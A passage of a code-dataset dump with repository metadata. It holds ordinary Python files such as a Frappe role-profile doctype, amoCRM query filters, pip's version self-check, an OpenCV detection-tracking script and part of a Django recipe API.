optimizers def run_train_split_start(self, split_idx, split_batch, opt_idx, optimizer): # set split_idx to trainer for tracking self.trainer.split_idx = split_idx # make sure only the gradients of the current optimizer's parameters are calculated if self.automatic_optimization and len(self.trainer.optimizers) > 1: model = self.trainer.get_model() model.toggle_optimizer(optimizer, opt_idx) self.trainer.logger_connector.on_train_split_start(split_idx, opt_idx, split_batch) def update_running_loss(self): accumulated_loss = self.accumulated_loss.mean() if accumulated_loss is not None: self.running_loss.append(self.accumulated_loss.mean() * self.trainer.accumulate_grad_batches) self.accumulated_loss.reset() def zero_grad_handler(self, batch_idx, optimizer, opt_idx): if self.automatic_optimization: self.on_before_zero_grad(optimizer) optimizers = enumerate([optimizer]) else: optimizers = self.get_optimizers_iterable() for idx, optimizer in optimizers: self.optimizer_zero_grad(batch_idx, optimizer, opt_idx)
true
true
f705d8375b61940c4c02bcdbae22797b6b711bb0
664
py
Python
frappe/core/doctype/role_profile/role_profile.py
erpnext-tm/frappe
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
[ "MIT" ]
null
null
null
frappe/core/doctype/role_profile/role_profile.py
erpnext-tm/frappe
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
[ "MIT" ]
null
null
null
frappe/core/doctype/role_profile/role_profile.py
erpnext-tm/frappe
7b470f28e1cf00b0659c01e06a2d0a4693b28d98
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Copyright (c) 2017, Frappe Technologies and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document class RoleProfile(Document): def autoname(self): """set name as Role Profile name""" self.name = self.role_profile def on_update(self): """Changes in role_profile reflected across all its user""" users = frappe.get_all("User", filters={"role_profile_name": self.name}) roles = [role.role for role in self.roles] for d in users: user = frappe.get_doc("User", d) user.set("roles", []) user.add_roles(*roles)
27.666667
74
0.721386
from __future__ import unicode_literals import frappe from frappe.model.document import Document class RoleProfile(Document): def autoname(self): self.name = self.role_profile def on_update(self): users = frappe.get_all("User", filters={"role_profile_name": self.name}) roles = [role.role for role in self.roles] for d in users: user = frappe.get_doc("User", d) user.set("roles", []) user.add_roles(*roles)
true
true
f705d8e2048ebd543efcfc2b8d5258b47b62b213
162
py
Python
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
1
2021-08-14T17:59:21.000Z
2021-08-14T17:59:21.000Z
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
4
2020-02-12T21:30:44.000Z
2020-04-15T20:06:46.000Z
output/models/ms_data/complex_type/ct_f013_xsd/__init__.py
tefra/xsdata-w3c-tests
b6b6a4ac4e0ab610e4b50d868510a8b7105b1a5f
[ "MIT" ]
null
null
null
from output.models.ms_data.complex_type.ct_f013_xsd.ct_f013 import ( FooType, MyType, Root, ) __all__ = [ "FooType", "MyType", "Root", ]
13.5
68
0.617284
from output.models.ms_data.complex_type.ct_f013_xsd.ct_f013 import ( FooType, MyType, Root, ) __all__ = [ "FooType", "MyType", "Root", ]
true
true
f705db97cc2202b63ed43321fb14e2dd46519851
1,758
py
Python
amocrm/v2/filters.py
rolldeep/amocrm_api
61111a9736e2893bc4c625bebe5e8a71645e9b25
[ "MIT" ]
null
null
null
amocrm/v2/filters.py
rolldeep/amocrm_api
61111a9736e2893bc4c625bebe5e8a71645e9b25
[ "MIT" ]
null
null
null
amocrm/v2/filters.py
rolldeep/amocrm_api
61111a9736e2893bc4c625bebe5e8a71645e9b25
[ "MIT" ]
null
null
null
import datetime class Filter: def __init__(self, name): self._name = name def _as_params(self): return {} class SingleFilter(Filter): def __call__(self, value): self._value = value return self def _as_params(self): return {"filter[{}]".format(self._name): self._value} class SingleListFilter(Filter): def __call__(self, value): self._value = value return self def _as_params(self): return {"filter[{}][]".format(self._name): self._value} class MultiFilter(Filter): def __call__(self, values): self._values = values return self def _as_params(self): return {"filter[{}][0]".format(self._name): self._values} class RangeFilter(Filter): def __call__(self, value_from, value_to): self._value_from = value_from self._value_to = value_to return self def _as_params(self): return { "filter[{}][from]".format(self._name): self._value_from, "filter[{}][to]".format(self._name): self._value_to, } class DateRangeFilter(RangeFilter): def __call__(self, value_from: datetime.datetime, value_to: datetime.datetime): self._value_from = int(value_from.timestamp()) self._value_to = int(value_to.timestamp()) return self class EventsFiltersByPipelineAndStatus(Filter): def __call__(self, pipline_id, status_id): self._pipline_id = pipline_id self._status_id = status_id return self def _as_params(self): return { "filter[value_before][leads_statuses][0][pipeline_id]": self._pipline_id, "filter[value_before][leads_statuses][0][status_id]": self._status_id }
25.478261
85
0.633106
import datetime class Filter: def __init__(self, name): self._name = name def _as_params(self): return {} class SingleFilter(Filter): def __call__(self, value): self._value = value return self def _as_params(self): return {"filter[{}]".format(self._name): self._value} class SingleListFilter(Filter): def __call__(self, value): self._value = value return self def _as_params(self): return {"filter[{}][]".format(self._name): self._value} class MultiFilter(Filter): def __call__(self, values): self._values = values return self def _as_params(self): return {"filter[{}][0]".format(self._name): self._values} class RangeFilter(Filter): def __call__(self, value_from, value_to): self._value_from = value_from self._value_to = value_to return self def _as_params(self): return { "filter[{}][from]".format(self._name): self._value_from, "filter[{}][to]".format(self._name): self._value_to, } class DateRangeFilter(RangeFilter): def __call__(self, value_from: datetime.datetime, value_to: datetime.datetime): self._value_from = int(value_from.timestamp()) self._value_to = int(value_to.timestamp()) return self class EventsFiltersByPipelineAndStatus(Filter): def __call__(self, pipline_id, status_id): self._pipline_id = pipline_id self._status_id = status_id return self def _as_params(self): return { "filter[value_before][leads_statuses][0][pipeline_id]": self._pipline_id, "filter[value_before][leads_statuses][0][status_id]": self._status_id }
true
true
f705dbc83088bdd8282fa9e38c778f2f552bec1f
6,550
py
Python
src/pip/_internal/self_outdated_check.py
jameshfisher/pip
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
[ "MIT" ]
null
null
null
src/pip/_internal/self_outdated_check.py
jameshfisher/pip
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
[ "MIT" ]
null
null
null
src/pip/_internal/self_outdated_check.py
jameshfisher/pip
8365bc3dcc21809f2fb86c4db5e40aaf2384c897
[ "MIT" ]
null
null
null
import datetime import hashlib import json import logging import os.path import sys from typing import TYPE_CHECKING from pip._vendor.packaging.version import parse as parse_version from pip._internal.index.collector import LinkCollector from pip._internal.index.package_finder import PackageFinder from pip._internal.metadata import get_default_environment from pip._internal.models.selection_prefs import SelectionPreferences from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_owner, replace from pip._internal.utils.misc import ensure_dir if TYPE_CHECKING: import optparse from typing import Any, Dict from pip._internal.network.session import PipSession SELFCHECK_DATE_FMT = "%Y-%m-%dT%H:%M:%SZ" logger = logging.getLogger(__name__) def _get_statefile_name(key): # type: (str) -> str key_bytes = key.encode() name = hashlib.sha224(key_bytes).hexdigest() return name class SelfCheckState: def __init__(self, cache_dir): # type: (str) -> None self.state = {} # type: Dict[str, Any] self.statefile_path = None # Try to load the existing state if cache_dir: self.statefile_path = os.path.join( cache_dir, "selfcheck", _get_statefile_name(self.key) ) try: with open(self.statefile_path, encoding="utf-8") as statefile: self.state = json.load(statefile) except (OSError, ValueError, KeyError): # Explicitly suppressing exceptions, since we don't want to # error out if the cache file is invalid. pass @property def key(self): # type: () -> str return sys.prefix def save(self, pypi_version, current_time): # type: (str, datetime.datetime) -> None # If we do not have a path to cache in, don't bother saving. if not self.statefile_path: return # Check to make sure that we own the directory if not check_path_owner(os.path.dirname(self.statefile_path)): return # Now that we've ensured the directory is owned by this user, we'll go # ahead and make sure that all our directories are created. 
ensure_dir(os.path.dirname(self.statefile_path)) state = { # Include the key so it's easy to tell which pip wrote the # file. "key": self.key, "last_check": current_time.strftime(SELFCHECK_DATE_FMT), "pypi_version": pypi_version, } text = json.dumps(state, sort_keys=True, separators=(",", ":")) with adjacent_tmp_file(self.statefile_path) as f: f.write(text.encode()) try: # Since we have a prefix-specific state file, we can just # overwrite whatever is there, no need to check. replace(f.name, self.statefile_path) except OSError: # Best effort. pass def was_installed_by_pip(pkg): # type: (str) -> bool """Checks whether pkg was installed by pip This is used not to display the upgrade message when pip is in fact installed by system package manager, such as dnf on Fedora. """ dist = get_default_environment().get_distribution(pkg) return dist is not None and "pip" == dist.installer def pip_self_version_check(session, options): # type: (PipSession, optparse.Values) -> None """Check for an update for pip. Limit the frequency of checks to once per week. State is stored either in the active virtualenv or in the user's USER_CACHE_DIR keyed off the prefix of the pip script path. 
""" installed_dist = get_default_environment().get_distribution("pip") if not installed_dist: return pip_version = installed_dist.version pypi_version = None try: state = SelfCheckState(cache_dir=options.cache_dir) current_time = datetime.datetime.utcnow() # Determine if we need to refresh the state if "last_check" in state.state and "pypi_version" in state.state: last_check = datetime.datetime.strptime( state.state["last_check"], SELFCHECK_DATE_FMT ) if (current_time - last_check).total_seconds() < 7 * 24 * 60 * 60: pypi_version = state.state["pypi_version"] # Refresh the version if we need to or just see if we need to warn if pypi_version is None: # Lets use PackageFinder to see what the latest pip version is link_collector = LinkCollector.create( session, options=options, suppress_no_index=True, ) # Pass allow_yanked=False so we don't suggest upgrading to a # yanked version. selection_prefs = SelectionPreferences( allow_yanked=False, allow_all_prereleases=False, # Explicitly set to False ) finder = PackageFinder.create( link_collector=link_collector, selection_prefs=selection_prefs, ) best_candidate = finder.find_best_candidate("pip").best_candidate if best_candidate is None: return pypi_version = str(best_candidate.version) # save that we've performed a check state.save(pypi_version, current_time) remote_version = parse_version(pypi_version) local_version_is_older = ( pip_version < remote_version and pip_version.base_version != remote_version.base_version and was_installed_by_pip('pip') ) # Determine if our pypi_version is older if not local_version_is_older: return # We cannot tell how the current pip is available in the current # command context, so be pragmatic here and suggest the command # that's always available. This does not accommodate spaces in # `sys.executable`. 
pip_cmd = f"{sys.executable} -m pip" logger.warning( "You are using pip version %s; however, version %s is " "available.\nYou should consider upgrading via the " "'%s install --upgrade pip' command.", pip_version, pypi_version, pip_cmd ) except Exception: logger.debug( "There was an error checking the latest version of pip", exc_info=True, )
33.937824
87
0.630382
import datetime import hashlib import json import logging import os.path import sys from typing import TYPE_CHECKING from pip._vendor.packaging.version import parse as parse_version from pip._internal.index.collector import LinkCollector from pip._internal.index.package_finder import PackageFinder from pip._internal.metadata import get_default_environment from pip._internal.models.selection_prefs import SelectionPreferences from pip._internal.utils.filesystem import adjacent_tmp_file, check_path_owner, replace from pip._internal.utils.misc import ensure_dir if TYPE_CHECKING: import optparse from typing import Any, Dict from pip._internal.network.session import PipSession SELFCHECK_DATE_FMT = "%Y-%m-%dT%H:%M:%SZ" logger = logging.getLogger(__name__) def _get_statefile_name(key): key_bytes = key.encode() name = hashlib.sha224(key_bytes).hexdigest() return name class SelfCheckState: def __init__(self, cache_dir): self.state = {} self.statefile_path = None if cache_dir: self.statefile_path = os.path.join( cache_dir, "selfcheck", _get_statefile_name(self.key) ) try: with open(self.statefile_path, encoding="utf-8") as statefile: self.state = json.load(statefile) except (OSError, ValueError, KeyError): # error out if the cache file is invalid. pass @property def key(self): # type: () -> str return sys.prefix def save(self, pypi_version, current_time): # type: (str, datetime.datetime) -> None # If we do not have a path to cache in, don't bother saving. if not self.statefile_path: return if not check_path_owner(os.path.dirname(self.statefile_path)): return ensure_dir(os.path.dirname(self.statefile_path)) state = { # file. "key": self.key, "last_check": current_time.strftime(SELFCHECK_DATE_FMT), "pypi_version": pypi_version, } text = json.dumps(state, sort_keys=True, separators=(",", ":")) with adjacent_tmp_file(self.statefile_path) as f: f.write(text.encode()) try: # Since we have a prefix-specific state file, we can just # overwrite whatever is there, no need to check. 
replace(f.name, self.statefile_path) except OSError: # Best effort. pass def was_installed_by_pip(pkg): # type: (str) -> bool dist = get_default_environment().get_distribution(pkg) return dist is not None and "pip" == dist.installer def pip_self_version_check(session, options): # type: (PipSession, optparse.Values) -> None installed_dist = get_default_environment().get_distribution("pip") if not installed_dist: return pip_version = installed_dist.version pypi_version = None try: state = SelfCheckState(cache_dir=options.cache_dir) current_time = datetime.datetime.utcnow() # Determine if we need to refresh the state if "last_check" in state.state and "pypi_version" in state.state: last_check = datetime.datetime.strptime( state.state["last_check"], SELFCHECK_DATE_FMT ) if (current_time - last_check).total_seconds() < 7 * 24 * 60 * 60: pypi_version = state.state["pypi_version"] # Refresh the version if we need to or just see if we need to warn if pypi_version is None: # Lets use PackageFinder to see what the latest pip version is link_collector = LinkCollector.create( session, options=options, suppress_no_index=True, ) # Pass allow_yanked=False so we don't suggest upgrading to a selection_prefs = SelectionPreferences( allow_yanked=False, allow_all_prereleases=False, ) finder = PackageFinder.create( link_collector=link_collector, selection_prefs=selection_prefs, ) best_candidate = finder.find_best_candidate("pip").best_candidate if best_candidate is None: return pypi_version = str(best_candidate.version) state.save(pypi_version, current_time) remote_version = parse_version(pypi_version) local_version_is_older = ( pip_version < remote_version and pip_version.base_version != remote_version.base_version and was_installed_by_pip('pip') ) # Determine if our pypi_version is older if not local_version_is_older: return # We cannot tell how the current pip is available in the current # command context, so be pragmatic here and suggest the command # that's always available. 
This does not accommodate spaces in pip_cmd = f"{sys.executable} -m pip" logger.warning( "You are using pip version %s; however, version %s is " "available.\nYou should consider upgrading via the " "'%s install --upgrade pip' command.", pip_version, pypi_version, pip_cmd ) except Exception: logger.debug( "There was an error checking the latest version of pip", exc_info=True, )
true
true
f705dc263f4b173513dc6e8e38729cebb3b5b1ae
259
py
Python
Python/treehopper/libraries/displays/led_shift_register.py
ehailey1/treehopper-sdk
c242f939a93d93da11ff79577666130c15aecec7
[ "MIT" ]
3
2018-03-16T07:00:42.000Z
2022-03-27T00:39:55.000Z
Python/treehopper/libraries/displays/led_shift_register.py
ehailey1/treehopper-sdk
c242f939a93d93da11ff79577666130c15aecec7
[ "MIT" ]
16
2016-08-12T18:51:04.000Z
2021-04-16T16:14:07.000Z
Python/treehopper/libraries/displays/led_shift_register.py
ehailey1/treehopper-sdk
c242f939a93d93da11ff79577666130c15aecec7
[ "MIT" ]
6
2015-11-04T15:53:49.000Z
2020-06-25T18:34:47.000Z
from treehopper.libraries.displays import LedDriver from treehopper.libraries.io.expander.shift_register import ChainableShiftRegisterOutput class LedShiftRegister(ChainableShiftRegisterOutput, LedDriver): def __init__(self): super().__init__()
32.375
88
0.822394
from treehopper.libraries.displays import LedDriver from treehopper.libraries.io.expander.shift_register import ChainableShiftRegisterOutput class LedShiftRegister(ChainableShiftRegisterOutput, LedDriver): def __init__(self): super().__init__()
true
true
f705dc6351fae60f5584a9468074494232907552
1,250
py
Python
userbot/plugins/stats.py
NIKHIL5757H/SimbhaUserbot
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
[ "MIT" ]
2
2020-07-25T17:58:55.000Z
2020-11-26T10:54:46.000Z
userbot/plugins/stats.py
NIKHIL5757H/SimbhaUserbot
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
[ "MIT" ]
null
null
null
userbot/plugins/stats.py
NIKHIL5757H/SimbhaUserbot
86bd946a47bd0d74f5ef3c46ef00f9bdb9bf11e0
[ "MIT" ]
2
2020-08-03T09:09:06.000Z
2020-08-12T05:05:24.000Z
from userbot import bot from telethon import events import asyncio from datetime import datetime from telethon.tl.types import User, Chat, Channel from uniborg.util import admin_cmd @bot.on(admin_cmd(pattern=r"stats")) async def _(event): if event.fwd_from: return start = datetime.now() u = 0 g = 0 c = 0 bc = 0 b = 0 dialogs = await bot.get_dialogs( limit=None, ignore_migrated=True ) for d in dialogs: currrent_entity = d.entity if type(currrent_entity) is User: if currrent_entity.bot: b += 1 else: u += 1 elif type(currrent_entity) is Chat: g += 1 elif type(currrent_entity) is Channel: if currrent_entity.broadcast: bc += 1 else: c += 1 else: print(d) end = datetime.now() ms = (end - start).seconds await event.edit(""" ================================= `Your Stats Obtained in {} seconds` `You have {} Private Messages` `You are in {} Groups` `You are in {} Super Groups` `You Are in {} Channels` `And finally Bots = {}` ===================================""".format(ms, u, g, c, bc, b))
25.510204
66
0.5312
from userbot import bot from telethon import events import asyncio from datetime import datetime from telethon.tl.types import User, Chat, Channel from uniborg.util import admin_cmd @bot.on(admin_cmd(pattern=r"stats")) async def _(event): if event.fwd_from: return start = datetime.now() u = 0 g = 0 c = 0 bc = 0 b = 0 dialogs = await bot.get_dialogs( limit=None, ignore_migrated=True ) for d in dialogs: currrent_entity = d.entity if type(currrent_entity) is User: if currrent_entity.bot: b += 1 else: u += 1 elif type(currrent_entity) is Chat: g += 1 elif type(currrent_entity) is Channel: if currrent_entity.broadcast: bc += 1 else: c += 1 else: print(d) end = datetime.now() ms = (end - start).seconds await event.edit(""" ================================= `Your Stats Obtained in {} seconds` `You have {} Private Messages` `You are in {} Groups` `You are in {} Super Groups` `You Are in {} Channels` `And finally Bots = {}` ===================================""".format(ms, u, g, c, bc, b))
true
true
f705dd4832b18fd425450cd30cdfb3cf0a126a5e
5,623
py
Python
tracking.py
hnkulkarni/cs231aApproachingOdt
07c68d787442243d653ae72a7e9473b4c3c5c6b4
[ "MIT" ]
null
null
null
tracking.py
hnkulkarni/cs231aApproachingOdt
07c68d787442243d653ae72a7e9473b4c3c5c6b4
[ "MIT" ]
null
null
null
tracking.py
hnkulkarni/cs231aApproachingOdt
07c68d787442243d653ae72a7e9473b4c3c5c6b4
[ "MIT" ]
null
null
null
# This file will track detections import tqdm import cv2 import matplotlib.pyplot as plt import matplotlib.patches as patches from matplotlib.ticker import NullLocator from cs231aApproachingOdt import utils as myutils from PIL import Image import os import torch import torchvision.ops.boxes as bops def match_detections(prev_path, prev_detection, new_path, new_detection, size=(640, 480)): prev_range = [*range(len(prev_detection))] new_range = [*range(len(new_detection))] permutations = myutils.unique_permutations(prev_range, new_range) fig, ax = plt.subplots(1, 2) prev_img = myutils.load_resize(prev_path, size) new_img = myutils.load_resize(new_path, size) matching_pairs = [] for old, new in permutations: [a.cla() for a in ax] draw_detection(prev_img, prev_detection[old], ax[0]) ax[0].set_title(f"{os.path.basename(prev_path)}") draw_detection(new_img, new_detection[new], ax[1]) ax[1].set_title(f"{os.path.basename(new_path)}") #plt.pause(0.1) iou = get_iou(prev_detection[old], new_detection[new]) if iou < 0.7: continue prev_crop = crop_detection(prev_img, prev_detection[old]) new_crop = crop_detection(new_img, new_detection[new]) #keypoint_matching(prev_crop, new_crop) methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR', 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED'] is_match = template_matching(new_crop, prev_crop, methods[3]) if is_match == True: matching_pairs.append((old, new)) plt.close(fig) return matching_pairs def get_iou(prev_detection, new_detection): box1 = new_detection[:4].reshape((1, 4)) box2 = prev_detection[:4].reshape((1, 4)) iou = bops.box_iou(box1, box2) return iou def template_matching(img1, template, method): fig_template, ax = plt.subplots() template_gray = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY) img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY) img = img1_gray.copy() w_t, h_t = template_gray.shape[::-1] w_i, h_i = img1_gray.shape[::-1] if (w_t > w_i) or (h_t > h_i): return False method = eval(method) # Apply 
template Matching res = cv2.matchTemplate(img1_gray, template_gray, method) min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res) #print(f"\n{min_val}, {max_val}, {min_loc}, {max_loc}") # If the method is TM_SQDIFF or TM_SQDIFF_NORMED, take minimum if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]: top_left = min_loc else: top_left = max_loc # bottom_right = (top_left[0] + w, top_left[1] + h) # cv2.rectangle(img, top_left, bottom_right, 255, 2) # plt.subplot(121), plt.imshow(res, cmap='gray') # plt.title('Matching Result'), plt.xticks([]), plt.yticks([]) # plt.subplot(122), plt.imshow(img, cmap='gray') # plt.title('Detected Point'), plt.xticks([]), plt.yticks([]) # plt.suptitle(method) # plt.show() # plt.close(fig_template) if max_val > 0.9: return True else: return False def keypoint_matching(img1, img2): # Source: https://docs.opencv.org/master/dc/dc3/tutorial_py_matcher.html img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY) img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY) myutils.show(img1_gray) orb = cv2.ORB_create() # find the keypoints and descriptors with ORB kp1, des1 = orb.detectAndCompute(img1_gray, None) kp2, des2 = orb.detectAndCompute(img2_gray, None) # create BFMatcher object bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True) # Match descriptors. matches = bf.match(des1, des2) # Sort them in the order of their distance. matches = sorted(matches, key=lambda x: x.distance) # Draw first 10 matches. 
img3 = cv2.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS) fig_match, ax_match = plt.subplot() plt.imshow(img3) plt.show() plt.close(fig_match) def crop_detection(img, detection): x1, y1, x2, y2, conf, cls_conf, cls_pred = detection crop = img[int(y1):int(y2), int(x1):int(x2)] return crop def draw_detection(img, detection, ax): ax.imshow(myutils.bgr2rgb(img)) x1, y1, x2, y2, conf, cls_conf, cls_pred = detection box_w = x2 - x1 box_h = y2 - y1 # Create a Rectangle patch bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=2, edgecolor="red", facecolor="none") # Add the bbox to the plot ax.add_patch(bbox) ax.set_xticks([]) ax.set_yticks([]) def tracking_by_detection(img_folder, image_paths, img_detections, size=(640, 480)): # Iterate through images and save plot of detections print("In Tracking By Detection") path_detections_zip = zip(image_paths, img_detections) num_images = len(image_paths) tqdm_pbar = tqdm.tqdm(path_detections_zip, total=num_images) tracks_dict = dict() for img_i, (path, detections) in enumerate(tqdm_pbar): tqdm_pbar.set_postfix({"Processing ": path}) if img_i == 0: print("Initialize Detections") continue matching_pairs = match_detections(prev_path=image_paths[img_i - 1], prev_detection=img_detections[img_i - 1], new_path=path, new_detection=detections, size=size) print(matching_pairs) tracks_dict[path] = matching_pairs myutils.pickle_save(os.path.join(img_folder, "output/tracks.pickle"), (tracks_dict, img_detections)) return tracks_dict
35.588608
119
0.676685
import tqdm import cv2 import matplotlib.pyplot as plt import matplotlib.patches as patches from matplotlib.ticker import NullLocator from cs231aApproachingOdt import utils as myutils from PIL import Image import os import torch import torchvision.ops.boxes as bops def match_detections(prev_path, prev_detection, new_path, new_detection, size=(640, 480)): prev_range = [*range(len(prev_detection))] new_range = [*range(len(new_detection))] permutations = myutils.unique_permutations(prev_range, new_range) fig, ax = plt.subplots(1, 2) prev_img = myutils.load_resize(prev_path, size) new_img = myutils.load_resize(new_path, size) matching_pairs = [] for old, new in permutations: [a.cla() for a in ax] draw_detection(prev_img, prev_detection[old], ax[0]) ax[0].set_title(f"{os.path.basename(prev_path)}") draw_detection(new_img, new_detection[new], ax[1]) ax[1].set_title(f"{os.path.basename(new_path)}") iou = get_iou(prev_detection[old], new_detection[new]) if iou < 0.7: continue prev_crop = crop_detection(prev_img, prev_detection[old]) new_crop = crop_detection(new_img, new_detection[new]) methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR', 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED'] is_match = template_matching(new_crop, prev_crop, methods[3]) if is_match == True: matching_pairs.append((old, new)) plt.close(fig) return matching_pairs def get_iou(prev_detection, new_detection): box1 = new_detection[:4].reshape((1, 4)) box2 = prev_detection[:4].reshape((1, 4)) iou = bops.box_iou(box1, box2) return iou def template_matching(img1, template, method): fig_template, ax = plt.subplots() template_gray = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY) img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY) img = img1_gray.copy() w_t, h_t = template_gray.shape[::-1] w_i, h_i = img1_gray.shape[::-1] if (w_t > w_i) or (h_t > h_i): return False method = eval(method) res = cv2.matchTemplate(img1_gray, template_gray, method) min_val, max_val, min_loc, max_loc = 
cv2.minMaxLoc(res) if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]: top_left = min_loc else: top_left = max_loc if max_val > 0.9: return True else: return False def keypoint_matching(img1, img2): img1_gray = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY) img2_gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY) myutils.show(img1_gray) orb = cv2.ORB_create() kp1, des1 = orb.detectAndCompute(img1_gray, None) kp2, des2 = orb.detectAndCompute(img2_gray, None) bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True) matches = bf.match(des1, des2) matches = sorted(matches, key=lambda x: x.distance) img3 = cv2.drawMatches(img1, kp1, img2, kp2, matches[:10], None, flags=cv2.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS) fig_match, ax_match = plt.subplot() plt.imshow(img3) plt.show() plt.close(fig_match) def crop_detection(img, detection): x1, y1, x2, y2, conf, cls_conf, cls_pred = detection crop = img[int(y1):int(y2), int(x1):int(x2)] return crop def draw_detection(img, detection, ax): ax.imshow(myutils.bgr2rgb(img)) x1, y1, x2, y2, conf, cls_conf, cls_pred = detection box_w = x2 - x1 box_h = y2 - y1 bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=2, edgecolor="red", facecolor="none") ax.add_patch(bbox) ax.set_xticks([]) ax.set_yticks([]) def tracking_by_detection(img_folder, image_paths, img_detections, size=(640, 480)): print("In Tracking By Detection") path_detections_zip = zip(image_paths, img_detections) num_images = len(image_paths) tqdm_pbar = tqdm.tqdm(path_detections_zip, total=num_images) tracks_dict = dict() for img_i, (path, detections) in enumerate(tqdm_pbar): tqdm_pbar.set_postfix({"Processing ": path}) if img_i == 0: print("Initialize Detections") continue matching_pairs = match_detections(prev_path=image_paths[img_i - 1], prev_detection=img_detections[img_i - 1], new_path=path, new_detection=detections, size=size) print(matching_pairs) tracks_dict[path] = matching_pairs myutils.pickle_save(os.path.join(img_folder, "output/tracks.pickle"), (tracks_dict, 
img_detections)) return tracks_dict
true
true
f705de5dde82e6bd54b2dfd92a538123dac03a9b
105
py
Python
scripts/quest/q5521e.py
G00dBye/YYMS
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
[ "MIT" ]
54
2019-04-16T23:24:48.000Z
2021-12-18T11:41:50.000Z
scripts/quest/q5521e.py
G00dBye/YYMS
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
[ "MIT" ]
3
2019-05-19T15:19:41.000Z
2020-04-27T16:29:16.000Z
scripts/quest/q5521e.py
G00dBye/YYMS
1de816fc842b6598d5b4b7896b6ab0ee8f7cdcfb
[ "MIT" ]
49
2020-11-25T23:29:16.000Z
2022-03-26T16:20:24.000Z
# Tot's reward lv 40 sm.completeQuest(5521) # Lv. 40 Equipment box sm.giveItem(2431877, 1) sm.dispose()
15
23
0.72381
sm.completeQuest(5521) # Lv. 40 Equipment box sm.giveItem(2431877, 1) sm.dispose()
true
true
f705de767d15e8ccdef551f1fa42f380207c8feb
11,462
py
Python
backend/api/views.py
vadikam100500/foodgram-project-react
11119e11d4919f72b3f104209102048ee38c366a
[ "PostgreSQL", "MIT" ]
1
2021-12-14T14:43:51.000Z
2021-12-14T14:43:51.000Z
backend/api/views.py
vadikam100500/foodgram-project-react
11119e11d4919f72b3f104209102048ee38c366a
[ "PostgreSQL", "MIT" ]
null
null
null
backend/api/views.py
vadikam100500/foodgram-project-react
11119e11d4919f72b3f104209102048ee38c366a
[ "PostgreSQL", "MIT" ]
null
null
null
import csv from django.contrib.auth import get_user_model from django.db.models.aggregates import Sum from django.http.response import HttpResponse from django.utils.decorators import method_decorator from djoser.serializers import SetPasswordSerializer from djoser.views import TokenCreateView from drf_yasg.utils import swagger_auto_schema from rest_framework import filters, status from rest_framework.decorators import action from rest_framework.generics import get_object_or_404 from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from rest_framework.viewsets import ModelViewSet from api import serializers from api.decorators import multi_method_decorator from api.docs.schemas import (EmptyAutoSchema, follower_params, recipe_request_body) from api.filters import GlobalFilterBackend from api.pagination import FollowPagination, LimitPagination from api.permissions import (IsAdminOrReadIfAuthenticatedObjPerm, IsAdminOrReadOnly, RecipePermission) from food.models import Ingredient, IngredientInRecipe, Recipe, Tag from interactions.models import Favorite, Follow, Purchase User = get_user_model() class CustomTokenCreateView(TokenCreateView): def _action(self, serializer): response = super()._action(serializer) response.status_code = status.HTTP_201_CREATED return response @multi_method_decorator( names=['update', 'partial_update', 'destroy'], decorator=swagger_auto_schema(auto_schema=None) ) class CustomUserViewSet(ModelViewSet): queryset = User.objects.all().order_by('id') serializer_class = serializers.CustomUserSerializer pagination_class = LimitPagination permission_classes = (IsAdminOrReadIfAuthenticatedObjPerm,) def get_serializer_class(self): if self.action in ('list', 'retrieve', 'me'): return serializers.CustomUserGetSerializer elif self.action == 'set_password': return SetPasswordSerializer elif self.action == 'subscriptions': return serializers.SubscriptionsSerializer elif self.action == 'subscribe': return 
